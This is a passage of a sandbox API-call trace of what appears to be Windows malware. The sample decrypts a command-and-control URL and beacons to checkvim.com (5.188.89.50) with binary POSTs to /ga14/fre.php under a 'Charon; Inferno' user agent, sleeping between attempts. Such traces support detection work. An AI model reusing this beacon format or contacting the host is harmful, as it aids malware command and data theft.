ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0232.150] GetProcessHeap () returned 0x840000 [0232.150] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fd70 [0232.150] GetProcessHeap () returned 0x840000 [0232.150] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0232.151] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0232.152] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0232.152] GetProcessHeap () returned 0x840000 [0232.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0232.152] GetProcessHeap () returned 0x840000 [0232.152] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0232.152] GetProcessHeap () returned 0x840000 [0232.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0232.152] GetProcessHeap () returned 0x840000 [0232.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0232.153] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0232.154] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0232.154] GetProcessHeap () returned 0x840000 [0232.154] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0232.154] GetProcessHeap () returned 0x840000 [0232.155] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0232.155] send (s=0x314, buf=0x873a58*, len=237, flags=0) returned 237 [0232.155] send (s=0x314, buf=0x87eb58*, len=159, flags=0) returned 159 [0232.155] GetProcessHeap () returned 0x840000 [0232.155] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0232.156] recv (in: s=0x314, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0232.514] GetProcessHeap () returned 0x840000 [0232.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0232.514] GetProcessHeap () returned 0x840000 [0232.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0232.514] GetProcessHeap () returned 0x840000 [0232.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0232.514] GetProcessHeap () returned 0x840000 [0232.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fd70 | out: hHeap=0x840000) returned 1 [0232.514] closesocket (s=0x314) returned 0 [0232.515] GetProcessHeap () returned 0x840000 [0232.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bf8 | out: hHeap=0x840000) returned 1 [0232.515] GetProcessHeap () returned 0x840000 [0232.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0232.515] GetProcessHeap () returned 0x840000 [0232.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0232.515] GetProcessHeap () returned 0x840000 [0232.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0232.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x9b8) returned 0x314 [0232.517] Sleep (dwMilliseconds=0xea60) [0232.518] GetProcessHeap () returned 0x840000 [0232.518] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0232.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.519] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0232.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.546] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0232.553] GetProcessHeap () returned 0x840000 [0232.553] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0232.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.554] CryptImportKey (in: hProv=0x86f798, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0232.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.555] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0232.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.557] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.557] GetProcessHeap () returned 0x840000 [0232.557] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0232.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.557] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0232.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.559] CryptDestroyKey (hKey=0x87e970) returned 1 [0232.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.560] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0232.560] GetProcessHeap () returned 0x840000 [0232.560] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0232.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.561] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.562] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.563] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.564] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.564] GetProcessHeap () returned 0x840000 [0232.564] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0232.564] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0232.564] GetProcessHeap () returned 0x840000 [0232.564] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0232.564] GetProcessHeap () returned 0x840000 [0232.564] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0232.564] GetProcessHeap () returned 0x840000 [0232.564] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0232.564] GetProcessHeap () returned 0x840000 [0232.564] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0232.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.565] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0232.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.571] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0232.577] GetProcessHeap () returned 0x840000 [0232.577] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0232.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.579] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9f0) returned 1 [0232.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.580] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0232.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.581] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.581] GetProcessHeap () returned 0x840000 [0232.581] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0232.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.582] CryptDecrypt (in: hKey=0x87e9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0232.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.583] CryptDestroyKey (hKey=0x87e9f0) returned 1 [0232.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.584] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0232.584] GetProcessHeap () returned 0x840000 [0232.584] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0232.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.585] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0232.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.587] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0232.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.588] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0232.588] GetProcessHeap () returned 0x840000 [0232.588] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0232.588] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0232.589] GetProcessHeap () returned 0x840000 [0232.589] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0232.589] socket (af=2, type=1, protocol=6) returned 0x318 [0232.589] connect (s=0x318, name=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0232.660] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0232.660] GetProcessHeap () returned 0x840000 [0232.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0232.660] GetProcessHeap () returned 0x840000 [0232.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0232.661] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0232.662] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0232.662] GetProcessHeap () returned 0x840000 [0232.662] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0232.662] GetProcessHeap () returned 0x840000 [0232.662] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0232.662] GetProcessHeap () returned 0x840000 [0232.662] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0232.662] GetProcessHeap () returned 0x840000 [0232.662] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0232.663] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0232.664] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0232.664] GetProcessHeap () returned 0x840000 [0232.664] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0232.664] GetProcessHeap () returned 0x840000 [0232.664] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0232.664] send (s=0x318, buf=0x873a58*, len=237, flags=0) returned 237 [0232.665] send (s=0x318, buf=0x87eb58*, len=159, flags=0) returned 159 [0232.665] GetProcessHeap () returned 0x840000 [0232.665] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0232.665] recv (in: s=0x318, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0233.030] GetProcessHeap () returned 0x840000 [0233.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0233.031] GetProcessHeap () returned 0x840000 [0233.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0233.031] GetProcessHeap () returned 0x840000 [0233.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0233.031] GetProcessHeap () returned 0x840000 [0233.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0233.031] closesocket (s=0x318) returned 0 [0233.032] GetProcessHeap () returned 0x840000 [0233.032] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0233.032] GetProcessHeap () returned 0x840000 [0233.032] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0233.032] GetProcessHeap () returned 0x840000 [0233.032] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0233.032] GetProcessHeap () returned 0x840000 [0233.032] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0233.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xedc) returned 0x318 [0233.036] Sleep (dwMilliseconds=0xea60) [0233.042] GetProcessHeap () returned 0x840000 [0233.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcf8 [0233.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.044] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0233.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.099] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0233.108] GetProcessHeap () returned 0x840000 [0233.108] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0233.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.109] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0233.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.111] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0233.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.112] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.112] GetProcessHeap () returned 0x840000 [0233.112] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0233.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.113] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcf8, pdwDataLen=0x19f9a4 | out: pbData=0x87fcf8, pdwDataLen=0x19f9a4) returned 1 [0233.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.114] CryptDestroyKey (hKey=0x87e330) returned 1 [0233.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.115] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0233.116] GetProcessHeap () returned 0x840000 [0233.116] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0233.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.117] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0233.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.118] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0233.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.119] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0233.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.120] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0233.120] GetProcessHeap () returned 0x840000 [0233.120] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0233.120] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0233.121] GetProcessHeap () returned 0x840000 [0233.121] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0233.121] GetProcessHeap () returned 0x840000 [0233.121] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0233.121] GetProcessHeap () returned 0x840000 [0233.121] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0233.121] GetProcessHeap () returned 0x840000 [0233.121] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f878 [0233.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.122] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0233.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.129] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0233.135] GetProcessHeap () returned 0x840000 [0233.135] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0233.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.136] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0233.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.137] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0233.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.138] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.138] GetProcessHeap () returned 0x840000 [0233.138] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0233.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.140] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f878, pdwDataLen=0x19f9a4 | out: pbData=0x87f878, pdwDataLen=0x19f9a4) returned 1 [0233.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.141] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0233.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0233.142] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0233.142] GetProcessHeap () returned 0x840000 [0233.142] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0233.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.143] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0233.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.143] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0233.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.145] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0233.145] GetProcessHeap () returned 0x840000 [0233.145] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0233.145] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0233.147] GetProcessHeap () returned 0x840000 [0233.147] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0233.147] socket (af=2, type=1, protocol=6) returned 0x31c [0233.147] connect (s=0x31c, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0233.218] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0233.218] GetProcessHeap () returned 0x840000 [0233.218] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0233.218] GetProcessHeap () returned 0x840000 [0233.218] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0233.219] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0233.219] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0233.219] GetProcessHeap () returned 0x840000 [0233.219] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0233.220] GetProcessHeap () returned 0x840000 [0233.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0233.220] GetProcessHeap () returned 0x840000 [0233.220] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0233.220] GetProcessHeap () returned 0x840000 [0233.220] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0233.220] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0233.221] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 